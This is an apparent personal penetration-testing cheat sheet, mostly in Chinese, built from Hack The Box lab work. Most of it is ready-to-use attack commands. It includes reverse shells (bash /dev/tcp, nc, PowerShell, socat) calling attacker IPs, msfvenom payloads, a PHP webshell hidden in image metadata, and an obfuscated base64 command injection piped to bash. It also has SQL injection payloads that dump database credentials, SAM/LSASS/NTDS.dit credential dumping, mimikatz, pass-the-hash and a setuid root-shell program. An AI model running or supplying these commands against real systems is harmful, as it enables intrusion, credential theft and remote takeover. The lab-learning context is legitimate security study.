MD5 decode https://www.somd5.com/
json 解析:https://jsonformatter.curiousconcept.com/
suid sudo :
https://gtfobins.github.io/ for linux
https://lolbas-project.github.io/# for windows
```
/exploit: /lib/i386-linux-gnu/libc.so.6: version `
'GLIBC_2.34' not found (required by . /exploit) Add the following commands for compiling
┌──(kali㉿kali)-[~/Tartarsauce]
└─$ sudo gcc exploit.c -static -m32 -Wl,--rpath="$GLIBC_2_33_LD" -o exploit
```
定時任務:
/etc/crontab
/etc/cron.d
/var/spool/cron/crontabs/root
timers:
systemctl list-timers
破解hash hashcat -m 7400 sammyhash
/usr/share/wordlists/rockyou.txt --show
如果出現:
```
Hashfile 'hash' on line 1 (admin:...ef1a54b012f6cf18968d9b9728b002b9): Token length exception
* Token length exception: 1/1 hashes
This error happens if the wrong hash type is specified, if the hashes are
malformed, or if input is otherwise not as expected (for example, if the
--username option is used but no username is present)
No hashes loaded.
```
參數加上 --username
Apache httpd 2.4.18:
https://www.exploit-db.com/exploits/34900
ubuntu kernel exploit:
https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629?source=post_page-----e7ff79f641f6--------------------------------
**Suid Privilege Escalation Script**
chown root:root folder
sudo chmod 6555 file
```
#include<stdio.h>
#include<unistd.h>
#include<sys/types.h>
int main()
{
setuid(geteuid());
system("/bin/bash");
return 0;
}
```
wpscan:
wpscan --url http://10.10.10.88/webservices/wp/ --erate p --plugins-detection aggressive -e u
└─$ wpscan --url http://blocky.htb/ --password-attack wp-login -U Notch --passwords /usr/share/wordlists/seclists/Passwords/xato-net-10-million-passwords-10000.txt
閱讀jar:
jd-gui
shell 上下左右 字元汙染:
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
ctrl + z
stty raw -echo; fg
reset
nmap
先掃描port再掃服務
nmap -sS -p- --min-rate 1000 -T4 -oN nmap.txt
>> sS TCP掃描
>> sV sC 查端口服務
>> O 作業系統掃描
>> sU UDP掃描
>> -p- 全端口
>> sn 存活探測(不端口掃描)
>> sP 存活探測(端口掃描)
udp掃到snmp:
snmpwalk
snmpwalk -v {snmp version} -c public {ip}
```
snmpwalk: No securityName specified
:
onesixtyone -c /opt/useful/SecLists/Discovery/SNMP/snmp.txt 10.129.14.128
```
sudo smtp-user-enum -M VRFY -U /usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt -t 10.129.26.164
88 port kerberos-sec :
445 port SMB:
暴力破解:
crackmapexec smb 10.10.11.236 -u guest -p '' --rid-brute --local-auth
登入:
smbclient -U admin -L \\10.10.10.111
查看訪問權限:
smbmap -u "admin" -p "imnothuman" -H 10.10.10.111 -P 445
msfconsole get shell:
windows/smb/psexec
mssql:crackmapexec mssql {ip} -u user.txt -p user.txt --no-bruteforce
mssql ntlm:
https://academy.hackthebox.com/module/116/section/1169
SSH 反向連接 & bind forwarding
GatewayPorts yes
ssh -R 1233:localhost:1233 webadmin@10.129.229.129 -i ssh -D 9050
5901、VNC:
vncviewer -passwd secret localhost:5901
nmap 弱點掃描
nmap --script vuln 10.10.10.79
如果nmap掃不到port 可能需要knock:
knock ip {knock number}
掃描結果太多可以輸入 sort -u 排序去重
未知port可以使用talent、nc嘗試
生成web shell :
laudanum
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.110.130 lport=8787 -f war -o payload.war
https://academy.hackthebox.com/module/158/section/1428
msfvenom -p windows/x64/meterpreter/reverse_https lhost= <InternalIPofPivotHost> -f exe -o backupscript.exe LPORT=8080
bash -c "bash -i >& /dev/tcp/10.10.15.68/1222 0>&1"
複寫 .sh
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 8443 >/tmp/f' | tee -a monitor.sh
開啟監聽等待bind shell:
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l 10.129.41.200 7777 > /tmp/f
windows powershell reverse shell:
1.ps1:
`$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()`
php:
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.6/4444 0>&1'");
socat:
socat TCP4:10.10.14.5:8443 EXEC:/bin/bash
socat file:`tty`,raw,echo=0 tcp-listen:4443
`powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',1234);$s = $client.GetStream();[byte[]]$b = 0..65535|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $data 2>&1 | Out-String );$sb2 = $sb + 'PS ' + (pwd).Path + '> ';$sbt = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbt,0,$sbt.Length);$s.Flush()};$client.Close()"`
監聽:
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.110.130
LHOST => 192.168.110.130
msf6 exploit(multi/handler) > set LPORT 8787
LPORT => 8787
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.110.130:8787
[*] Sending stage (58829 bytes) to 192.168.110.140
[*] Meterpreter session 1 opened (192.168.110.130:8787 -> 192.168.110.140:43974) at 2024-02-16 00:05:16 -0500
meterpreter > shell
反向shell:
如果有nc:
kali: nc -lvp 112
靶機: nc -e /bin/bash 192.168.110.130 112
python:
```
#!/usr/bin/env python
import os
import sys
try:
os.system('nc -e /bin/bash 10.10.14.2 9999')
except:
sys.exit()
```
hash:
辨識
https://hashes.com/en/tools/hash_identifier
hash-identifier {hash}
hashcat -a 用於指定攻擊模式。
-a 0:直接暴力破解模式,嘗試所有可能的組合。
-a 3:基於組合的攻擊模式,使用字典和規則生成組合。
-a 6:混合攻擊模式,結合字典攻擊和暴力破解。
hashcat -m 1400 h -a 3 susan_nasus_?d?d?d?d?d?d?d?d?d
= susan_nasus_{0123....}
webshell:
圖片 magic digit: GIF89a; 加到開頭
exiftool -Comment='<?php system("nc 10.10.14.15 1234 -e /bin/bash"); ?>' 1.png
將payload注入png 然後命名:shell.php.png
sql手動注入:
注意如果是在網址列需要先做url encode 因為有些符號會錯誤解析 如&
使用burp suite攔截送出
到repeater 查看右下角的封包長度與時間確認是否注入成功
嘗試步驟:
1.
admin' or '1'='1(或是admin' or '1'LIKE'1。如果=被過濾)
admin' or '1'='1'-- (或是admin' or '1'LIKE'1'--。如果=被過濾)
2.
嘗試手邊獲得的舊帳號密碼
3.
admin'
admin''
admin'''
看回應的byte有無改變
4.
邏輯注入:
從右邊decode處修改參數
admin' and 1=1--(admin' && 1=1--。如果 and 被過濾)
admin' and '1'='1(admin' && '1'='1。如果 and 被過濾)
5.
時間注入:
admin' and sleep(10) ='1'-- (admin' and sleep(10) LIKE '1'--)
admin' and sleep(10) ='1 (admin' and sleep(10) LIKE '1)
>時間注入成功的情況
如果注入成功就把sleep(10)改成'1'後送出
>可以發現回應長度從916 bytes變成893 bytes
所以這邊就可以用 admin' or '1' like '1 輸入在password欄位登入。
都不行:
category1=a///A77ss/e%0A;<%25%3d+system("echo IyEvYmluL2Jhc2gKYmFzaCAgLWMgImJhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTIxLzIyMjIgMD4mMSIK | base64 -d | bash")+%25>+
注意 base64 不能有 = 更換port直到=消失
_________________________________________________________________
先http://10.10.10.143/room.php?cod=101-1
正常
http://10.10.10.143/room.php?cod=100'
發現網頁能正常訪問只是不顯示內容
http://10.10.10.143/room.php?cod=1 and 1=2
發現網頁能正常訪問只是不顯示內容
>有注入
http://10.10.10.143/room.php?cod=100 UNION SELECT 1;-- -
http://10.10.10.143/room.php?cod=100 UNION SELECT 1,2;-- -
....
http://10.10.10.143/room.php?cod=100 UNION SELECT 1,2,3,4,5,6,7;-- -
List DBs
>php?cod=100 **UNION SELECT 1, group_concat(schema_name), 3, 4, 5, 6, 7 from information_schema.schemata;-- -**
>
Output:hotel,information_schema,mysql,performance_schema
Show Tables in hotel
>php?cod=100 **UNION SELECT 1, group_concat(table_name), 3, 4, 5, 6, 7 from information_schema.tables where table_schema='hotel' ;-- -**
>
Output:room
Show Columns in room
>php?cod=100 **UNION SELECT 1, group_concat(column_name), 3, 4, 5, 6, 7 from information_schema.columns where table_name='room';-- -**
>
Output:cod,name,price,descrip,star,image,mini
Show Tables in mysql
>php?cod=100 **UNION SELECT 1, group_concat(table_name), 3, 4, 5, 6, 7 from information_schema.tables where table_schema='mysql' ;-- -**
>
Output:
column_stats,columns_priv,db,event,func, general_log,gtid_slave_pos,help_category, help_keyword,help_relation,help_topic,host, index_stats,innodb_index_stats,innodb_table_stats, plugin,proc,procs_priv,proxies_priv,roles_mapping, servers,slow_log,table_stats,tables_priv,time_zone, time_zone_leap_second,time_zone_name, time_zone_transition,time_zone_transition_type,user
Show Columns in user
>php?cod=100 **UNION SELECT 1, group_concat(column_name), 3, 4, 5, 6, 7 from information_schema.columns where table_name='user';-- - **
Output:Host,User,Password,Select_priv,Insert_priv,Update_priv, Delete_priv,Create_priv,Drop_priv,Reload_priv, Shutdown_priv,Process_priv,File_priv,Grant_priv, References_priv,Index_priv,Alter_priv,Show_db_priv, Super_priv,Create_tmp_table_priv,Lock_tables_priv, Execute_priv,Repl_slave_priv,Repl_client_priv, Create_view_priv,Show_view_priv,Create_routine_priv, Alter_routine_priv,Create_user_priv,Event_priv, Trigger_priv,Create_tablespace_priv,ssl_type,ssl_cipher, x509_issuer,x509_subject,max_questions,max_updates, max_connections,max_user_connections,plugin, authentication_string,password_expired,is_role, default_role,max_statement_time
Get Username / Password
>php?cod=100 **UNION SELECT 1, user,3, 4,password, 6, 7 from mysql.user;-- - **
Output:
DBadmin
2D2B7A5E4E637B8FBA1D17F40318F277D29964D0
_________________________________________________________________
爆破:
通常需要先獲得身分驗證,網頁正常登入後使用bp抓包,到repeater複製Authorization:
然後加到dirb 以-H添加標頭 "Authorization: XXXXX"
如果有cookie也能一並附上
網頁小技巧:
1. 如果有無限loading的網頁,可以按F12>Network>Reload,然後block 沒有回應的元素就可以了,然後注意F12不能關閉否則block就失效了
2. 看到有?seacher=xxx 這種參數型的url可以嘗試注入
* 一樣先丟到burp suite repeater
>seacher' seacher'' seacher''' ...觀察byte長度
>seacher'+and+'1'='1
* 都不行就走模糊測試
3. 模糊測試
用法: fuzz -w /usr/share/wordlists/dirb/common.txt -u http://ip:port/....../?seacher=FUZZ -H '從bp複製cookie' -H '從bp複製authorization' -mc 200 -o fuzz.log
>FUZZ是要模糊測試的輸入點
>-H是輸入標頭提供身分驗證
>-mc 200 是只輸出回應200的網頁
>-o 輸出檔案 方便後續grep過濾
>-of csv 如果json太難閱讀可以指定CSV
然後就可以利用grep過濾大部分相同返回長度的結果
>可以看到csv log中大部分結果長度都是11674,輸入cat fuzz.log | grep -v 11674過濾。 -v是反選。
這些可以得到部分可以操作的參數,比如id
然後利用可用指令上傳payload或是測試是否可以出網做shell連接,又或是去/etc/ssh/sshd_config,搜尋
* PubkeyAuthentication yes
* AuthorizedKeysFile
* AllowUsers 確認可以ssh的用戶,是否有限制用戶
以這為例ssh限制thebobs,但當前用戶是samir。
需要提權,可以嘗試:
sudo -l 查看有沒有sudo權限
如果我們對特定用戶的 .ssh 目錄具有讀取訪問許可權,我們可能會讀取他們在 或 找到 /home/user/.ssh/id_rsa 的私有 ssh 金鑰,並使用它來登錄伺服器。
如果我們可以讀取 /root/.ssh/ 目錄並可以讀取 id_rsa 檔案,我們可以將其複製到我們的機器並使用 -i 標誌登錄:
```
kappamoss@htb[/htb]$ vim id_rsa
kappamoss@htb[/htb]$ chmod 600 id_rsa
kappamoss@htb[/htb]$ ssh user@10.10.10.10 -i id_rsa
```
ssh破解:
hydra -L user.list -P password.list ssh://10.129.42.197
ssh連線需要透過密碼或是公鑰連線,需要注意權限要求:
1. .ssh 700
2. authorized_keys 600
先把key拿出來
複製到攻擊機,並且輸入chmod 0400 id_rsa
然後在攻擊機利用id_rsa輸入:
ssh thebobs@192.168.2.104 -i id_rsa -o PubkeyAcceptedKeyTypes=+ssh-rsa
> -o PubkeyAcceptedKeyTypes=+ssh-rsa 是舊版ssh登入需要添加的指令,沒加會出錯,丟去google就能找到解法。
> -i id_rsa 指定ssh key 就不需要密碼
如果需要端口轉發可以使用-L:
>本地kali 8082 port映射到192.168.122.65的8800 port
進入python shell後輸入:
>import pty;
>pty.spawn(""/bin/bash")
其他shell 如果有python:
python -c 'import pty;pty.spawn("/bin/bash")'
然後再把linpeas.sh 丟進去蒐集資訊。
如果不能wget可以使用base64 encode後複製過去再decode
然後利用uname -a確認系統版本
再使用searchsploit找可用漏洞 (先找.c檔)
靶機如果沒有gcc 需要先在攻擊機編譯,則需要輸入 gcc -static xxx.c -o xxx
然後base64 encode複製到靶機再decode,再利用chmod +x添加執行權限
編譯前須要先打開c檔 確定是不是有特殊要求
如果還有內網需要滲透,則取得root後還需要進行資訊蒐集:linpeas
netstat -lntp查看連線端口 可以確認資料庫是否存在
>3306
有些資料庫保存的密碼可能是多base64 encode
web文件名稱注入
發現可注入,修改sleep(10)成:
XSS注入:
使用beef-xss
>插入標籤
>
not a tty
python -c 'import pty; pty.spawn("/bin/bash")'
目錄掃描:
gobuster dir -u http://10.10.10.60 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -x txt,php,html -t 100
域名掃描:
subfinder -d hackerone.com -v
遞迴掃目錄、檔案
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://academy.htb/FUZZ -recursion -recursion-depth 1 -e .php -v
參數fuzz: GET
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://faculty.academy.htb:32178/courses/linux-security.php7?FUZZ=KEY -fs xxx
參數fuzz: POST
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://faculty.academy.htb:32178/courses/linux-security.php7 -X POST -d 'FUZZ=KEY' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx
搭配
curl http://admin.academy.htb:31390/admin/admin.php -X POST -d 'id=key' -H 'Content-Type: application/x-www-form-urlencoded'
卡在Apache網頁登入可以嘗試
https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass/tree/master 身分驗證繞過
網頁找不到入口點,可以嘗試找虛擬主機
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://academy.htb:31390/ -H 'Host: FUZZ.academy.htb' -fs 900
└─$ gobuster vhost -w=/usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u devvortex.htb --append-domain --no-error -t 10
ffuf -w ./vhosts -u http://192.168.10.10 -H "HOST: FUZZ.randomtarget.com" -fs 612
SMB:
smbclient -L \\10.10.10.123
smbclient -N \\\\10.10.10.123\\general
smbclient -N \\\\10.10.10.123\\Development
DNS:
subbrute(recommand)
DIG - AXFR Zone Transfer
dig axfr friendzone.red @10.10.10.123
or
subfinder
https://markfhunt.com/hackthebox-active-subdomain-enumeration/
利用已有sessions
>F12 >Storage > cookie > 修改value
常見reverse shell
https://github.com/six2dez/pentest-book/blob/master/exploitation/reverse-shells.md
網頁注入過濾空格:base64轉換
```
${IFS} 等效於空格字元
echo${IFS}"Y3VybCAxMC4xMC4xNC40OjEyMjIvY29kZS5zaHxiYXNo"|base64${IFS}-d|bash;
```
查看網路監聽
netstat -an
查看當前進程
ps auxww
mysql udf提權:
show variables like "%secure_file_priv%";
若secure_file_priv為空
: https://github.com/SEC-GO/Red-vs-Blue/blob/master/linux%E7%8E%AF%E5%A2%83%E4%B8%8B%E7%9A%84MySQL%20UDF%E6%8F%90%E6%9D%83.md
Joomla! 未授權訪問漏洞 POC:
(mysql 帳密)
https://github.com/yusinomy/CVE-2023-23752
翻 /administrator/templates/atum/index.php
zip破解
zip2john
└─$ fcrackzip -D -c a -p /usr/share/wordlists/rockyou.txt --use-unzip 1.zip
redis: └─$ redis-cli -h 10.10.10.160
john:
john 1.john -wordlist=/usr/share/wordlists/rockyou.txt
mysql:
└─$ sudo mysql -u robin -h 10.129.184.54 -p
mssql:
https://academy.hackthebox.com/module/116/section/1169
sqlcmd -S SRVMSSQL\SQLEXPRESS -U julio -P 'MyPassword!' -y 30 -Y 30
sqsh -S 10.129.203.7 -U julio -P 'MyPassword!' -h
>
> python3 /usr/share/doc/python3-impacket/examples/mssqlclient.py backdoor:Password1@10.129.245.64 -windows-auth
>
> select name from sys.databases
oracle:
> sudo odat passwordguesser -p 1521 -d XE -s 10.129.205.19
rdp:
xfreerdp /u:Administrator /v:10.129.92.152
IMAP:
openssl s_client -connect <ip>:imaps
1 LOGIN username password
1 LIST "" *
1 SELECT INBOX
1 FETCH 1 RFC822
子域枚舉:
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://83.136.255.150:32178 -H "Host: FUZZ.academy.htb" -fs xxx
確認網頁能接受的副檔名:
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/web-extensions.txt:FUZZ -u http://faculty.academy.htb:32178/indexFUZZ
amass enum -d githubapp.com -v
gobuster dns -d githubapp.com -w /usr/share/wordlists/dirb/common.txt
預設帳密:
https://raw.githubusercontent.com/ihebski/DefaultCreds-cheat-sheet/main/DefaultCreds-Cheat-Sheet.csv
windows base64 encode/decode:
https://stackoverflow.com/questions/16945780/decoding-base64-in-batch
windows 抓取明文:
https://github.com/AlessandroZ/LaZagne/releases
windows sam 取 LSA hash:
https://academy.hackthebox.com/module/147/section/1315
```
C:\WINDOWS\system32> reg.exe save hklm\sam C:\sam.save
The operation completed successfully.
C:\WINDOWS\system32> reg.exe save hklm\system C:\system.save
The operation completed successfully.
C:\WINDOWS\system32> reg.exe save hklm\security C:\security.save
The operation completed successfully.
python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
```
LSASS
```
Open Task Manager > Select the Processes tab > Find & right click the Local Security Authority Process > Select Create dump file
or
(會被防毒偵測)
get pid
PS C:\Windows\system32> Get-Process lsass
PS C:\Windows\system32> rundll32 C:\windows\system32\comsvcs.dll, MiniDump <pid> C:\lsass.dmp full
拿去kali:
pypykatz lsa minidump /home/peter/Documents/lsass.dmp
== MSV ==
Username: bob
Domain: DESKTOP-33E7O54
LM: NA
NT: 64f12cddaa88057e06a81b54e73b949b
SHA1: cba4e545b7ec918129725154b29f055e4cd5aea8
DPAPI: NA
```
https://academy.hackthebox.com/module/147/section/1359
AD NTDS.dit:
```
net user xxx 查看 是否有domain admin
PS C:\> vssadmin CREATE SHADOW /For=C:
PS C:\NTDS> cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit
或是如果有smb帳密:
crackmapexec smb 10.129.202.85 -u JMarston -p P@ssword! --ntds
sudo hashcat -m 1000 64f12cddaa88057e06a81b54e73b949b /usr/share/wordlists/rockyou.txt
```
linux 抓明文:
```
firefox
https://academy.hackthebox.com/module/147/section/1320
Decrypting Firefox Credentials:
https://github.com/unode/firefox_decrypt
python3.9 firefox_decrypt.py
or
laZagne.py
```
Pass the Hash (PtH):
`crackmapexec smb 10.129.201.126 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453 -x whoami`
拿目前所有的登入憑證(需要管理者權限)
```
mimikatz.exe privilege::debug sekurlsa::logonpasswords
```
passthehash 開啟不同用戶的cmd: 可以建立reverse shell
參考https://academy.hackthebox.com/module/147/section/1638
payload產生網頁:https://www.revshells.com/
```
mimikatz.exe privilege::debug "sekurlsa::pth /user:julio /rc4:64F12CDDAA88057E06A81B54E73B949B /domain:inlanefreight.htb /run:cmd.exe" exit
```
```
Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "powershell -e <payload>"
```
RDP:
先改機碼:
`reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f`
```
xfreerdp /v:10.129.201.126 /u:julio /pth:64F12CDDAA88057E06A81B54E73B949B
```
Kerberos :
直接看
https://academy.hackthebox.com/module/147/section/1639
```
mimikatz.exe
privilege::debug
sekurlsa::tickets /export
exit
dir *.kirbi
```
抓所有users Kerberos Keys
```
mimikatz.exe
privilege::debug
sekurlsa::ekeys
輸出的aes256_hmac 可以用來Pass the ticket
```
Rubeus - Pass the Key or OverPass the Hash
```
Rubeus.exe asktgt /domain:inlanefreight.htb /user:john /aes256:9279bcbd40db957a0ed0d3856b2e67f9bb58e6dc7fc07207d0763ce2713f11dc /nowrap
```
Linux: Pass the Ticket (PtT)
檢查 Linux 機器是否已加入網域
realm list
找ticket:(需要可寫)
find / -name *keytab* -ls 2>/dev/null
WINRM:
evil-winrm -i 10.129.202.222 -u johanna -p 1231234!
*Evil-WinRM* PS C:\Users\johanna\Documents> download Logins.kdbx /home/htb/Logins.kdbx
pop3:
```
smtp-user-enum -M RCPT -U users.list -D inlanefreight.htb -t 10.129.203.12
hydra -l marlin@inlanefreight.htb -P pws.list -f 10.129.203.12 pop3
telnet 10.129.203.12 110
```
ssh 代理rdp 內網 pivot
proxychains裡面設定好轉發端口
ssh -D 9050 ubuntu@10.129.119.190
proxychains4 xfreerdp /v:172.16.5.19 /u:victor /p:pass@123
ping 掃描 linux:
for i in {1..254} ;do (ping -c 1 172.16.5.$i | grep "bytes from" &) ;done
ping掃描 windows:
for /L %i in (1 1 254) do ping 172.16.5.%i -n 1 -w 100 | find "Reply"
表單攻擊:
hydra -l user -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -f 94.237.53.3 -s 31276 http-post-form "/admin_login.php:user=^USER^&pass=^PASS^:F=<form name='log-in'"
F=<form name='log-in'" 是失敗訊息 也就是收到回應有包含這個字串的都判斷失敗 繼續破解
NFS:
```
kappamoss@htb[/htb]$ proxychains showmount -e 172.16.8.20
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:8081-<><>-172.16.8.20:111-<><>-OK
|S-chain|-<>-127.0.0.1:8081-<><>-172.16.8.20:2049-<><>-OK
Export list for 172.16.8.20:
/DEV01 (everyone)
```
Sign in with Wallet
Connect another wallet